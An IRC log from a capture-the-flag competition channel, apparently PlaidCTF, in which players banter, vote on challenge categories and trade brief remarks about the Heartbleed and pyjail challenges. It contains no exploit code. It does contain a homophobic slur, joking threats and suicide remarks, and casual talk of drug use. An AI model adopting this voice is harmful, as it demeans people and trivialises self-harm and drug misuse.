(02:46:15) (+clockish) frozencemetery:
(02:46:16) (+clockish) _ _ _ _ ____
(02:46:16) (+clockish) | | | | / \ | | | _ \
(02:46:16) (+clockish) | |_| | / _ \ | | | |_) |
(02:46:16) (+clockish) | _ |/ ___ \| |___| __/
(02:46:16) (+clockish) |_| |_/_/ \_\_____|_|
(02:46:23) (synthverity) Mighty Sucking Pwna rangers!
(02:46:23) (+frozencemetery) D:
(02:46:23) (insanitybit) hax
(02:46:24) (insanitybit) hax
(02:46:25) (insanitybit) ban
(02:46:25) (insanitybit) ban
(02:46:28) (+mserrano) pls
(02:46:33) (insanitybit) no too late
(02:46:37) (insanitybit) ban
(02:46:40) (insanitybit) ban all of you
(02:46:44) (tokki) lol
(02:46:45) (jagger_) is this page at http://6c4dm56aer6xn2h2.onion/ up? from misc 200?
(02:46:53) (synthverity) It's Happening!!!
(02:46:57) (insanitybit) .onion isn't a real thing try .com
(02:46:58) (insanitybit) duh
(02:47:03) (insanitybit) step #1
(02:47:10) (shortkidd) try .garlic as well
(02:47:14) (insanitybit) .salt
(02:47:15) (+clockish) jagger_: that problem is working as intended ;)
(02:47:16) (insanitybit) i hear salts are important
(02:47:18) (insanitybit) to securities
(02:47:24) (shortkidd) .wannab
(02:47:30) (insanitybit) the callout
(02:47:40) shortkidd SNAP
(02:47:52) (insanitybit) ^
(02:47:55) (jagger_) clockish, thx
(02:47:55) (insanitybit) wrecked
(02:48:05) (shortkidd) #rekt
(02:48:17) (insanitybit) rest in poop
(02:48:19) (insanitybit) #poop
(02:48:26) (shortkidd) rip in pieces
(02:48:33) (synthverity) #Octothorpe
(02:48:42) (shortkidd) ohgod he spelled it right too
(02:48:49) (shortkidd) most people say thrope
(02:48:57) (insanitybit) it's pronounced thrope
(02:48:58) (insanitybit) it's thrope
(02:49:06) (insanitybit) i dare you to spell it thrope
(02:49:07) (insanitybit) i fkn dare you
(02:49:11) (insanitybit) ill kill you
(02:49:11) (synthverity) And that's with two shots of spirytus
(02:49:13) (tokki) thor!
(02:49:17) (+mserrano) ok you guys opened web
(02:49:18) (+mserrano) good
(02:49:26) (insanitybit) thorrrrr
(02:49:30) (insanitybit) FML
(02:49:31) (insanitybit) REALLY
(02:49:32) (insanitybit) WEB
(02:49:33) (insanitybit) REALLY
(02:49:41) (tokki) aw... was waiting for pwnables..
(02:49:46) (insanitybit) same
(02:49:54) (+frozencemetery) should open zfs soonish tho
(02:50:02) (+mserrano) lol
(02:50:15) (insanitybit) ill give an admin all the bitcoins i hacked from mtgox if they open up the pwnables
(02:50:18) (+mserrano) we're actually... kinda low on pwnables this year
(02:50:20) (insanitybit) its legit
(02:50:20) (shortkidd) insanitybit: http://lmgtfy.com/?q=octothrope
(02:50:20) (tokki) lol
(02:50:21) (+mserrano) in case you hadn't noticed
(02:50:27) (+mserrano) our hard pwnable is in production
(02:50:49) (insanitybit) yeah but im an idiot so givve me like the 100 lvl one
(02:51:05) (insanitybit) http://conricpr.wordpress.com/2013/06/20/alter-your-facebook-experience-use-an-octothrope/
(02:51:13) (asmoday) ok I have a lot of certificates for heartbleed what do I do with it
(02:51:22) (insanitybit) give them to me
(02:51:46) (bobsteam) wewt, there we go mtpox
(02:52:27) (insanitybit) ho wlong till the next vote
(02:52:33) (insanitybit) how do i change my name to [CISSP]insanitybit
(02:52:33) (insanitybit) btw
(02:52:44) (+mserrano) type /nick [CISSP]insanitybit
(02:52:57) nIck: (insanitybit) is now known as ([CISSP]insanityb)
(02:52:59) ([CISSP]insanityb) sweet
(02:53:02) ([CISSP]insanityb) oh god
(02:53:05) qUit: (nope_) (a2f31ed0@gateway/web/freenode/ip.162.243.30.208) Ping timeout: 240 seconds
(02:53:06) ([CISSP]insanityb) there's a limit
(02:53:08) (bobsteam) insanityb
(02:53:10) ([CISSP]insanityb) NO
(02:53:11) ([CISSP]insanityb) FML
(02:53:16) ([CISSP]insanityb) IM NOT INSANITYBIT
(02:53:20) (reanimus) Cheombuteo ttokgatji nal bakkuryeo haji ma
(02:53:26) nIck: ([CISSP]insanityb) is now known as ([CISSP]ibit)
(02:54:20) ([CISSP]ibit) https://www.youtube.com/watch?v=tc42TNLw7zU
(02:54:21) (tokki) lol
(02:54:54) ([CISSP]ibit) https://www.youtube.com/watch?v=0Z9R57maGvc
(02:54:57) ([CISSP]ibit) ^ important for that challenge
(02:54:59) ([CISSP]ibit) trust me
(02:55:25) (+clockish) ^ Trust him
(02:55:32) (+clockish) [CISSP]ibit knows his shit
(02:55:36) (+mserrano) all the kpop is important
(02:56:07) ([CISSP]ibit) ^
(02:56:31) (asmoday) I keep getting the same certs from heartbleed what part of this is the flag
(02:56:35) ([CISSP]ibit) https://www.youtube.com/watch?v=yzC4hFK5P3g
(02:56:37) (tokki) am I supposed to listen to this the whole ctf
(02:56:48) (tokki) and then like at the last minute it spits out the flag
(02:56:58) ([CISSP]ibit) how do i do the shrug emoji
(02:57:04) (inter) who
(02:57:05) (inter) the fuck
(02:57:08) (inter) puts ponponpon
(02:57:08) (tokki) *shrug*
(02:57:11) qUit: (RedRover) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(02:57:13) (bobsteam) https://www.youtube.com/watch?v=yzC4hFK5P3g
(02:57:13) ([CISSP]ibit) ¯\_(ツ)_/¯,
(02:57:21) (tokki) wait wtf
(02:57:32) (inter) the Çѱ¹¾î is real
(02:57:32) qUit: (bativoland) (
[email protected]) Remote host closed the connection
(02:57:40) (+mserrano) okay
(02:57:45) (+mserrano) I am going to sleep for a couple hours
(02:57:53) (bobsteam) dontdoit
(02:57:54) (bobsteam) youll lose
(02:57:55) (+mserrano) if shit breaks while I am asleep I am sorry
(02:57:59) (tokki) no
(02:58:02) (tokki) i dare you to sleep
(02:58:07) (+mserrano) just send me a message and I'll fix it when I get up
(02:58:07) (+mserrano) <3
(02:58:21) ([CISSP]ibit) ⊂(´・◡・⊂ )∘˚˳°
(02:58:29) (inter) mserrano i can rent you sleep from the sleep bank
(02:58:37) (inter) the interest is your life huehue
(02:58:45) (synthverity) Sleep? I can sleep when I'm dead
(02:58:51) (tokki) dat laugh
(02:58:56) ([CISSP]ibit) ill be sleeping saturday night
(02:59:36) (inter) [CISSP]ibit, are you guys cissp groupies
(02:59:45) ([CISSP]ibit) i love cissps and cissp culture
(03:00:24) (+clockish) frozencemetery and I are up for a while
(03:00:27) ([CISSP]ibit) this pyjail one is annoying last years was easier
(03:00:27) (bobsteam) just finish the game by tomorrow and sleep tomorrow night? good plan :D
(03:00:35) ([CISSP]ibit) yup
(03:00:37) (+clockish) but no guarentees on being able to fix kpop if it breaks :P
(03:00:39) ([CISSP]ibit) oh hey it's bobsteam
(03:00:47) ([CISSP]ibit) no kpop = no ctf
(03:00:50) ([CISSP]ibit) sorry but them's the breaks
(03:00:56) (inter) etes-vous les gars de Montreal?
(03:00:56) (+clockish) [CISSP]ibit: pro tip, this one is easier :P
(03:00:59) jOin: (auscompgeek) (aucg@firefox/community/auscompgeek)
(03:01:04) (inter) clockish, you are kidding me
(03:01:06) ([CISSP]ibit) really? last year we were further
(03:01:09) ([CISSP]ibit) mean
(03:01:12) ([CISSP]ibit) the first half was obvi
(03:01:20) ([CISSP]ibit) the threadlock is fucking w/ me
(03:01:29) nIck: (criple_ripper|aw) is now known as (criple_ripper)
(03:01:38) (inter) everything seems to be fucking with us
(03:01:46) (inter) the existance of life and death
(03:01:54) (tokki) listen to this
(03:01:55) (tokki) https://www.youtube.com/watch?v=oNS0Ffb5L60
(03:01:55) ([CISSP]ibit) i just grabbed my vodka and beer and im waiting for pwnables while my team mate works on pyjail
(03:01:59) (synthverity) Dude, are you high?
(03:02:09) ([CISSP]ibit) hell yeah
(03:02:09) (tokki) everyone's supposed to be high
(03:02:10) ([CISSP]ibit) hell yeha
(03:02:11) ([CISSP]ibit) hell YEAH
(03:02:12) (bobsteam) dudea re you not?
(03:02:15) (inter) who desont blaze here
(03:02:18) (tokki) yeha
(03:02:19) ([CISSP]ibit) ^^
(03:02:21) ([CISSP]ibit) blazeit
(03:02:21) (+frozencemetery) I am only awake now because I was asleep when this started :|
(03:02:24) (inter) [CISSP]ibit canadian pride
(03:02:26) (inter) #ubc
(03:02:36) (inter) #dealers
(03:02:37) (architekt) yay blazerz
(03:02:37) ([CISSP]ibit) can we just drop this fucking "plaidctf" shit and make this irc #kpop
(03:02:41) (inter) #420in8days
(03:02:43) (tokki) lol
(03:02:43) (+clockish) #yolo420blazeitfaggit
(03:02:48) (inter) dude
(03:02:48) (inter) im
(03:02:50) (inter) gonna be
(03:02:52) (inter) so stoked up
(03:02:53) (inter) for 420
(03:02:57) (inter) i pocketted 1k dolla
(03:02:59) (+frozencemetery) I mean, we can't stop you from listening to kpop while playing plaidctf
(03:03:03) ([CISSP]ibit) i cant even cuz of an internship
(03:03:03) ([CISSP]ibit) its such bs
(03:03:12) ([CISSP]ibit) frozencemetery you could ever stop me
(03:03:15) ([CISSP]ibit) from listening to kpop
(03:03:18) ([CISSP]ibit) i love you bb
(03:03:20) (+frozencemetery) welp
(03:03:21) (inter) dude
(03:03:23) (inter) its all about
(03:03:25) (inter) hyuna
(03:03:27) (inter) nobody else
(03:03:28) (tokki) lol
(03:03:31) ([CISSP]ibit) lmao
(03:03:32) (inter) #hyuna
(03:03:41) (tokki) #hyuna4evr
(03:03:46) (inter) suzi? who dat whore
(03:03:50) (inter) #hyuna
(03:03:55) ([CISSP]ibit) #slammed
(03:03:57) (synthverity) #Huehuena4evr
(03:03:59) qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Quit: Page closed
(03:04:02) ([CISSP]ibit) huehuehuehuehue
(03:04:03) ([CISSP]ibit) ja
(03:04:04) (inter) cash4told.com
(03:04:16) ([CISSP]ibit) damn
(03:04:25) ([CISSP]ibit) i only know one person on this irc
(03:04:29) ([CISSP]ibit) also i thikn i remember bobsteam
(03:04:32) ([CISSP]ibit) bobsteam did you do it last year
(03:04:34) (inter) dont you
(03:04:36) (inter) remember me?
(03:04:39) (inter) from ndh 2012?
(03:04:41) (tokki) *gasp*
(03:04:58) ([CISSP]ibit) :O
(03:05:00) (inter) been 2 years
(03:05:00) (inter) rofl
(03:05:03) (bobsteam) nope, I'm new this year :)
(03:05:05) qUit: (aloha_) (76468068@gateway/web/freenode/ip.118.70.128.104) Ping timeout: 240 seconds
(03:05:06) ([CISSP]ibit) that cant have been me
(03:05:07) (inter) cuz i remember you
(03:05:08) (tokki) *gasp*
(03:05:18) ([CISSP]ibit) wat
(03:05:20) ([CISSP]ibit) is ndh
(03:05:21) ([CISSP]ibit) even
(03:05:24) (inter) you were trying to exchange keys with me
(03:05:27) (inter) and i said no
(03:05:28) ([CISSP]ibit) wat
(03:05:29) (bobsteam) but I feel good if people I don't know remember me :D
(03:05:32) (inter) jk
(03:05:34) ([CISSP]ibit) lmfao
(03:05:42) (tokki) lol
(03:05:42) (tokki) nuit du hack
(03:05:42) ([CISSP]ibit) bobsteam dont even lie
(03:05:43) ([CISSP]ibit) were you like
(03:05:45) ([CISSP]ibit) at bsides
(03:05:48) ([CISSP]ibit) or csaw
(03:05:49) ([CISSP]ibit) or something
(03:05:52) (inter) or
(03:05:53) (inter) wait
(03:05:58) (inter) [CISSP]ibit were you at csaw
(03:05:59) (bobsteam) haha
(03:06:08) (inter) cuz if you were im pretty sure i talked to you before
(03:06:10) ([CISSP]ibit) i didn't go to csaw but i remoted
(03:06:20) (RPISEC) :>
(03:06:25) (inter) https://www.youtube.com/watch?v=em3npJ8Xf58
(03:06:28) (inter) good music
(03:06:33) (inter) to listen to while playing ctf
(03:06:39) jOin: (beugueuT4T) (4c871846ca@gateway/web/cgi-irc/kiwiirc.com/x-szfzakfsqubjpymb)
(03:06:45) (inter) and blazing couple kushrolls
(03:06:45) ([CISSP]ibit) is anyone still playin gthe ctf even
(03:06:51) (inter) im taking a break
(03:06:54) ([CISSP]ibit) im just fkn drinking and waiting fro pwn
(03:06:55) (inter) and studying my econ midterm
(03:06:56) (inter) in 11 hours
(03:07:02) (tokki) pwn pwn
(03:07:02) ([CISSP]ibit) lmao @ studying for skewl
(03:07:03) (bobsteam) good music http://www.youtube.com/watch?v=eh7lp9umG2I
(03:07:04) (tokki) good lick
(03:07:05) ([CISSP]ibit) fkn nerd damn
(03:07:05) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(03:07:07) (inter) dude
(03:07:08) (bobsteam) will last for 11 hours
(03:07:10) (inter) fuck you
(03:07:12) ([CISSP]ibit) lol
(03:07:12) (inter) #ubc
(03:07:13) ([CISSP]ibit) :3
(03:07:14) (inter) #econ
(03:07:15) (inter) #sauder
(03:07:17) (inter) ggwp
(03:07:17) ([CISSP]ibit) lollll
(03:07:24) (inter) i actually
(03:07:26) (inter) managed to
(03:07:27) (inter) solve like
(03:07:28) ([CISSP]ibit) #canada
(03:07:28) (beugueuT4T) hey guys
(03:07:29) (tokki) skewl
(03:07:30) (inter) 2 problems other than
(03:07:32) (inter) pyjail
(03:07:36) (inter) and study for econ
(03:07:36) tokki is on spring break
(03:07:37) (inter) rofl
(03:07:38) ([CISSP]ibit) did you solve pyjail
(03:07:39) ([CISSP]ibit) cause like
(03:07:40) (inter) no
(03:07:41) ([CISSP]ibit) its pissing me off
(03:07:42) (inter) fuck that problem
(03:07:44) (inter) i got pretty close
(03:07:45) ([CISSP]ibit) i got the reference
(03:07:46) (tokki) lol
(03:07:49) (beugueuT4T) i'm struggled with misc10
(03:07:50) ([CISSP]ibit) i can read/write files
(03:07:51) ([CISSP]ibit) ugh
(03:07:51) (inter) but then im stuck after
(03:07:53) (inter) yeah
(03:07:56) (inter) i got to the point
(03:08:06) (inter) where i can execute code to manipulate file io
(03:08:08) (inter) but then from there
(03:08:14) (inter) im like completely stuck
(03:08:24) ([CISSP]ibit) yeah
(03:08:27) (beugueuT4T) do i have to do with flippo
(03:08:30) ([CISSP]ibit) the lock
(03:08:32) ([CISSP]ibit) is fucking w/ me
(03:08:34) (inter) dude
(03:08:39) (inter) del __builtins__
(03:08:39) ([CISSP]ibit) and i cant get a reference to the lock members
(03:08:40) (inter) who the fuck
(03:08:41) (inter) does that
(03:08:44) ([CISSP]ibit) ASSHOLES
(03:08:46) (inter) probably only clockish
(03:08:46) ([CISSP]ibit) ASSHOLES DO IT
(03:08:50) (inter) ooh
(03:08:57) (inter) clockish, [CISSP]ibit just called you an asshole
(03:09:01) (inter) disqualify him :-)
(03:09:02) ([CISSP]ibit) ^
(03:09:05) ([CISSP]ibit) :)
(03:09:10) ([CISSP]ibit) luv u babez
(03:09:14) (inter) bbz
(03:09:18) (inter) but then
(03:09:20) (+clockish) conratz to 0xffa for RSA solve!
(03:09:23) (inter) this econ final tho
(03:09:35) (inter) im trying to memorize graphs
(03:09:40) (+clockish) inter: Why, he's right?
(03:09:41) (tokki) moniez
(03:09:42) (inter) and i cant
(03:09:47) (inter) do it
(03:09:52) (inter) im not blazed enough
(03:09:52) (inter) to study
(03:09:56) (inter) and its like 1 am
(03:09:57) (tokki) lol
(03:10:00) (inter) no dealers nearby
(03:10:01) ([CISSP]ibit) lma
(03:10:01) ([CISSP]ibit) o
(03:10:08) ([CISSP]ibit) its 4 here
(03:10:38) (inter) i kind of want to pop adderall
(03:10:39) (tokki) it's noon here
(03:10:45) ([CISSP]ibit) i did
(03:10:45) (inter) but i dont have those too
(03:10:46) ([CISSP]ibit) ealier
(03:10:48) ([CISSP]ibit) wait
(03:10:49) ([CISSP]ibit) no id idnt
(03:10:52) ([CISSP]ibit) shh
(03:10:57) (inter) and
(03:10:59) (inter) i see my roomie
(03:11:04) (inter) snorting painkillers
(03:11:10) (+cai_) nice 0xffa
(03:11:19) (+cai_) people get to vote again >:-)
(03:11:21) (inter) im never snorting anything in my life
(03:11:22) ([CISSP]ibit) YES
(03:11:24) ([CISSP]ibit) PWN
(03:11:24) ([CISSP]ibit) PWN
(03:11:25) ([CISSP]ibit) PWN
(03:11:25) (bobsteam) inter you have final tomorrow?
(03:11:29) (inter) yeah
(03:11:31) (inter) in 11 hours
(03:11:33) (inter) respectively
(03:11:36) ([CISSP]ibit) VOTE 2
(03:11:36) ([CISSP]ibit) VOTE 2
(03:11:38) ([CISSP]ibit) PLZ
(03:11:40) (inter) and i want to put 4 hours of sleeping in between
(03:11:41) (bobsteam) damn, saturday? lame ;c
(03:11:49) ([CISSP]ibit) does canada have saturdays?
(03:11:50) (inter) yep
(03:11:52) (inter) my prof
(03:11:54) (inter) is a dick
(03:11:57) (inter) but its 12pm exam
(03:11:57) ([CISSP]ibit) the mroe you know ig uess
(03:11:59) (inter) so its about right
(03:12:11) (bobsteam) lol
(03:12:41) (tokki) how do you guys know what category each number stands for?
(03:12:43) (inter) [CISSP]ibit est cissp a Montreal?
(03:12:58) ([CISSP]ibit) x_x
(03:13:00) (inter) or are you guys straight up english
(03:13:04) qUit: (potato__) (
[email protected]) Remote host closed the connection
(03:13:06) ([CISSP]ibit) whats a cssp even
(03:13:09) ([CISSP]ibit) im us
(03:13:11) ([CISSP]ibit) of a
(03:13:13) ([CISSP]ibit) nyx
(03:13:15) ([CISSP]ibit) ny
(03:13:15) ([CISSP]ibit) c
(03:13:17) ([CISSP]ibit) rep
(03:13:28) (inter) is
(03:13:29) (inter) cissp
(03:13:29) (inter) in
(03:13:30) (tokki) ooh
(03:13:31) (inter) montreal?
(03:13:36) (inter) straight up translation
(03:13:40) (inter) my french is horrible sorry
(03:13:48) ([CISSP]ibit) je suis la joun fis
(03:13:50) ([CISSP]ibit) ;)
(03:14:01) (inter) ooh
(03:14:02) (bobsteam) WHAT'S GOING ON!?
(03:14:05) (bobsteam) AND I SAY
(03:14:11) (bobsteam) HEEEYEYYYYYYYYYY YEA YEA YEA
(03:14:12) (tokki) je ne parle pas francais!
(03:14:13) (inter) vous devez
(03:14:13) (tokki) lol
(03:14:16) (bobsteam) WHATS GOING ON
(03:14:17) (+frozencemetery) JE SUIS UN BEAR
(03:14:19) (synthverity) Bullshit
(03:14:20) (tokki) lol
(03:14:25) ([CISSP]ibit) un souris dans le sal de clas
(03:14:28) (sven) MOONSPEAK!
(03:14:32) ([CISSP]ibit) in the gay community
(03:14:34) ([CISSP]ibit) i'm known as a daddy
(03:14:35) ([CISSP]ibit) and a bear
(03:14:37) ([CISSP]ibit) im a daddy bear
(03:14:38) (tokki) :O
(03:14:48) (inter) the anal is real
(03:14:48) (synthverity) That's hot
(03:15:00) (bobsteam) ano, sumimasen ga nani o hanashimataka
(03:15:09) ([CISSP]ibit) o
(03:15:11) ([CISSP]ibit) ja
(03:15:11) (tokki) is that japanese :O
(03:15:13) (inter) wata shi wa
(03:15:16) (synthverity) But I don't want the AIDS, so get the fuck away from me
(03:15:20) ([CISSP]ibit) ni hao ma
(03:15:22) ([CISSP]ibit) wo hao ni ne
(03:15:22) (tokki) STD
(03:15:24) ([CISSP]ibit) zaitien
(03:15:25) (inter) dude
(03:15:25) (bobsteam) hai nihonga desu
(03:15:26) (inter) DUDE
(03:15:29) (inter) I learned
(03:15:30) (inter) chinese
(03:15:30) (tokki) :O
(03:15:32) (bobsteam) it was japanaese not hciniese
(03:15:34) (inter) through playing battlefield 4
(03:15:35) ([CISSP]ibit) i learned it for like 2 weeks
(03:15:36) ([CISSP]ibit) i know
(03:15:36) ([CISSP]ibit) bob
(03:15:38) (tokki) lol
(03:15:39) ([CISSP]ibit) but thats the best i can do
(03:15:40) ([CISSP]ibit) ok
(03:15:40) (inter) QUAI QU NA
(03:15:42) (inter) ZHE SHI NI DE
(03:15:42) (bobsteam) ok fine
(03:15:46) ([CISSP]ibit) why
(03:15:48) ([CISSP]ibit) you gotta call me out like that
(03:15:49) ([CISSP]ibit) im trying my best
(03:15:50) (inter) XIE XIE LE YI SHENG
(03:15:53) (tokki) is this like language learning time
(03:16:00) (inter) play battlefield 4 guys
(03:16:02) (inter) its best for chiense
(03:16:11) (tokki) lol
(03:16:13) jOin: (nvs) (6adc5033@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.80.51)
(03:16:23) (inter) ok fuck
(03:16:26) (inter) im losing my concentration
(03:16:35) (bobsteam) its 1 am
(03:16:43) (synthverity) Who the fuck was concentrating?
(03:16:45) (tokki) lol
(03:16:46) ([CISSP]ibit) ^
(03:16:48) (+cai_) nice RDot for getting Kpop super fast :)
(03:16:51) (+frozencemetery) OH HELL YES
(03:16:57) ([CISSP]ibit) hey can i have a + in my name
(03:16:59) (synthverity) I'm fucking out of it, and have been for a while
(03:17:01) (tokki) lol
(03:17:13) (+cai_) you get to vote yet again
(03:17:18) ([CISSP]ibit) YES
(03:17:18) ([CISSP]ibit) 2
(03:17:19) ([CISSP]ibit) VOTE 2
(03:17:25) (bobsteam) oh my god do I pray, I pray every single day, NYAAAAAAAAAAAAA for this institution
(03:17:29) ([CISSP]ibit) WAIT
(03:17:29) ([CISSP]ibit) VOTE 1
(03:17:32) ([CISSP]ibit) VOTE 1 PLZZ OMGZ
(03:17:32) (tokki) how do you know which number you should vote for?
(03:17:39) ([CISSP]ibit) and he tries
(03:17:41) ([CISSP]ibit) OH MY GOD DO I TRY
(03:17:44) ([CISSP]ibit) I TRY ALL THE TIME
(03:17:44) (doom) UP
(03:17:44) (doom) UP
(03:17:45) (doom) UP
(03:17:46) (tokki) YES YOU DO
(03:17:46) (doom) UP
(03:17:47) (doom) START
(03:17:48) (+cai_) lol
(03:17:48) (doom) START
(03:17:50) (doom) UP
(03:17:51) (bobsteam) :D
(03:17:54) ([CISSP]ibit) d
(03:17:54) ([CISSP]ibit) d
(03:17:55) ([CISSP]ibit) b
(03:17:55) ([CISSP]ibit) b
(03:17:58) (+cai_) 2 will get you the chance card
(03:18:01) (tokki) db
(03:18:03) (tokki) wat
(03:18:06) (tokki) :O
(03:18:10) ([CISSP]ibit) if i dont get pwnables 100
(03:18:12) ([CISSP]ibit) ill kill myself
(03:18:14) ([CISSP]ibit) that blood is on your hands
(03:18:15) ([CISSP]ibit) so
(03:18:17) (tokki) me too
(03:18:17) (synthverity) Pwnables!!!!!!!!!!!
(03:18:18) ([CISSP]ibit) just saying
(03:18:22) ([CISSP]ibit) rip
(03:18:23) (tokki) pwnables ftw
(03:18:23) ([CISSP]ibit) etc
(03:18:25) ([CISSP]ibit) ^
(03:18:26) (tokki) rip
(03:18:57) (tokki) our team has one point
(03:18:59) ([CISSP]ibit) do i listen to triple baka 10 hour or heyeyeyeyeyee 10 hour
(03:18:59) ([CISSP]ibit) idk
(03:19:03) ([CISSP]ibit) hours has 21 lol
(03:19:06) ([CISSP]ibit) we've been on pyjail
(03:19:07) ([CISSP]ibit) 4eva
(03:19:08) (tokki) are they goddamn serious
(03:19:09) ([CISSP]ibit) but its only like 3 of us
(03:19:14) (doom) I don't get voting
(03:19:28) (tokki) ya me neither
(03:19:47) (+frozencemetery) voting is easy! The people who agree with you vote one way and the people who are wrong vote in other ways
(03:19:48) ([CISSP]ibit) is it pwn
(03:19:49) ([CISSP]ibit) did we get pwn
(03:19:55) ([CISSP]ibit) did we
(03:19:56) ([CISSP]ibit) get pwn
(03:19:57) ([CISSP]ibit) :|
(03:20:07) (doom) Which one do we vote for
(03:20:09) (doom) for pwnables
(03:20:09) (doom) :>
(03:20:09) ([CISSP]ibit) pwn
(03:20:10) ([CISSP]ibit) 1
(03:20:10) (tokki) :|
(03:20:11) ([CISSP]ibit) 1
(03:20:12) (synthverity) 1
(03:20:12) ([CISSP]ibit) vote 1
(03:20:13) (synthverity) 1
(03:20:13) ([CISSP]ibit) :s
(03:20:13) (synthverity) 1
(03:20:14) ([CISSP]ibit) :x
(03:20:15) ([CISSP]ibit) 1
(03:20:15) (tokki) chance 2
(03:20:17) (tokki) 2
(03:20:17) ([CISSP]ibit) NO 1
(03:20:19) ([CISSP]ibit) DO 1
(03:20:19) (tokki) 2
(03:20:19) (synthverity) Please!
(03:20:21) ([CISSP]ibit) FML
(03:20:22) (doom) UP
(03:20:24) (doom) LEFT
(03:20:24) ([CISSP]ibit) TOKKI
(03:20:25) ([CISSP]ibit) Y
(03:20:25) (doom) LEFT
(03:20:27) (doom) LEFT
(03:20:27) (tokki) jk
(03:20:28) ([CISSP]ibit) NOPLZ
(03:20:28) (tokki) 2
(03:20:32) ([CISSP]ibit) im
(03:20:33) ([CISSP]ibit) crying
(03:20:33) ([CISSP]ibit) plz
(03:20:34) (synthverity) Fucking chance just rolls again!
(03:20:35) (tokki) 2
(03:20:38) ([CISSP]ibit) plz
(03:20:40) ([CISSP]ibit) tokki
(03:20:42) ([CISSP]ibit) y
(03:20:47) (synthverity) It's the worst you can possibly do
(03:20:48) (tokki) k
(03:20:50) (tokki) 1
(03:20:53) (+frozencemetery) [CISSP]ibit: please stop spamming the channel
(03:20:54) (+cai_) yes, chance gets you to roll again
(03:20:55) ([CISSP]ibit) :3
(03:20:57) (bobsteam) omg whatscat is so cat
(03:21:02) ([CISSP]ibit) :O
(03:21:05) (tokki) much cat
(03:21:20) (doom) DEP/ASLR on the pwnables?
(03:21:25) (tokki) :O
(03:21:38) ([CISSP]ibit) they never use ASLR
(03:21:41) (+frozencemetery) doom: answer is usually on
(03:22:08) ([CISSP]ibit) ASLR? or just DEP?
(03:22:11) ([CISSP]ibit) last year none of them had ASLR iirc
(03:22:13) (doom) yeah figured as much
(03:24:31) tokki dies
(03:25:00) (chuckleberry) heartbleed server very unreliable
(03:25:02) (chuckleberry) :(
(03:25:45) (tokki) is the heartbleed server supposed to refuse your connection?
(03:25:50) (chuckleberry) no
(03:25:54) (inter) what if i told you no
(03:25:56) (chuckleberry) at least, i don't think so
(03:25:59) (inter) and what if clockish told you no
(03:26:05) (tokki) *gasp*
(03:26:18) (reanimus) it dies a lot
(03:26:20) (reanimus) lol
(03:26:24) (+cai_) tokki: if you get connection refused, you should try other ports
(03:26:29) (tokki) ok :)
(03:26:46) (arthurdent) lol
(03:26:54) (+frozencemetery) heartbleed is sketchy and therefore isn't allowed to have a non-sketchy server ;)
(03:27:25) (+clockish) tokki: as it says in the description, try a few different ports.
(03:27:31) (deject3d) ok who is screwing with the reeeekeee chall
(03:27:39) (arthurdent) i just keep getting an error when the connection is successful
(03:27:43) (tokki) clockish: yup :)
(03:27:44) (deject3d) "touch poop"
(03:27:47) (deject3d) rly
(03:27:52) (tokki) poo
(03:28:00) (+cai_) grats beollejavi for getting kpop :)
(03:28:00) ([CISSP]ibit) pup
(03:28:11) (tokki) puppy
(03:28:44) (+clockish) tokki: also I accidentally just killed it
(03:28:52) (+clockish) so hold on a sec
(03:29:06) (+cai_) voting ends in 8 minutes
(03:29:36) (tokki) clockish: ahahaha kk
(03:29:47) (+clockish) I thought I could make it better
(03:29:51) (+clockish) I forkbomed myself
(03:29:55) (tokki) :O
(03:31:02) (LuckyY) WTF
(03:31:04) (pipecork) clockish: classic
(03:31:07) (LuckyY) the scoreboard has 2 sides
(03:31:13) (tokki) wat
(03:31:16) ([CISSP]ibit) lmfao
(03:31:28) ([CISSP]ibit) what did you fork bomb?
(03:31:33) (+clockish) heartbleed
(03:32:11) jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
(03:32:34) (tokki) y have i seen all these nicknames somewhere
(03:33:18) ([CISSP]ibit) which
(03:33:36) (tokki) the people that just joined
(03:33:44) ([CISSP]ibit) idk them :x
(03:34:03) (sven) problem hanindling SSL record packet - wrong type?
(03:34:06) (sven) fail
(03:34:21) (tokki) just found out our team is registered as north korea
(03:34:36) (tokki) :D
(03:35:00) (pipecork) wow so many teams from north korea
(03:35:04) (synthverity) Best Korea?
(03:35:04) (pipecork) such an original joke
(03:35:11) (pipecork) ha ha ha
(03:35:20) (arthurdent) hehe
(03:35:33) (arthurdent) tokki: what team?
(03:35:34) (poppopret) is there a reliable port that heartbleed works on?
(03:35:38) (+cai_) voting ends in a minute
(03:35:49) (+cai_) poppopret: not really, just try random ports
(03:35:51) (synthverity) Vote 1
(03:35:52) (+clockish) poppopret It's down right now, working on it
(03:35:54) (tokki) arthurdent: LeaveRet
(03:35:55) (synthverity) Vote 1
(03:35:58) (synthverity) Please
(03:36:08) (+cai_) seems like it's going to be 1 :)
(03:36:09) (+clockish) cai_: TIL: AWS cannot kill forkbomed servers
(03:36:11) (synthverity) And thank you
(03:36:11) (tokki) :D
(03:36:16) (arthurdent) tokki: is that a university group?
(03:36:33) (tokki) arthurdent: nope, random teenage group :p
(03:37:07) (synthverity) Random Teenage Mutant Group? Of tortoises?
(03:37:16) (tokki) lol ya
(03:37:18) (+cai_) clockish: dang..
(03:37:18) (+cai_) force shutdown doesn't work?
(03:37:19) (+cai_) pwnable 100 is open
(03:37:21) (chuckleberry) don't know if server is fucked or if connection time outs is part of the challenge :(
(03:37:23) (tokki) :D
(03:37:31) (tokki) lets pwn
(03:37:50) (+cai_) chuckleberry: which one
(03:37:58) (x7r0n) how did tomcr00se get 41 ? is ther any challenge with 20pts other than crypto-20 which i dint see
(03:37:59) (x7r0n) ?
(03:38:04) ([CISSP]ibit) PWNABLES
(03:38:07) (synthverity) YEA!!!
(03:38:09) (chuckleberry) cai_: the onion service for rendezvous?
(03:38:14) (chuckleberry) available?
(03:38:20) (+cai_) it should be running fine
(03:38:20) qUit: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(03:38:27) (chuckleberry) ok
(03:38:28) ([CISSP]ibit) making instant ramen noodles
(03:38:31) (chuckleberry) thx
(03:38:41) (+cai_) x7r0n: probably through breakthrough points?
(03:39:02) (x7r0n) wats that ke bonus for solving faster ?
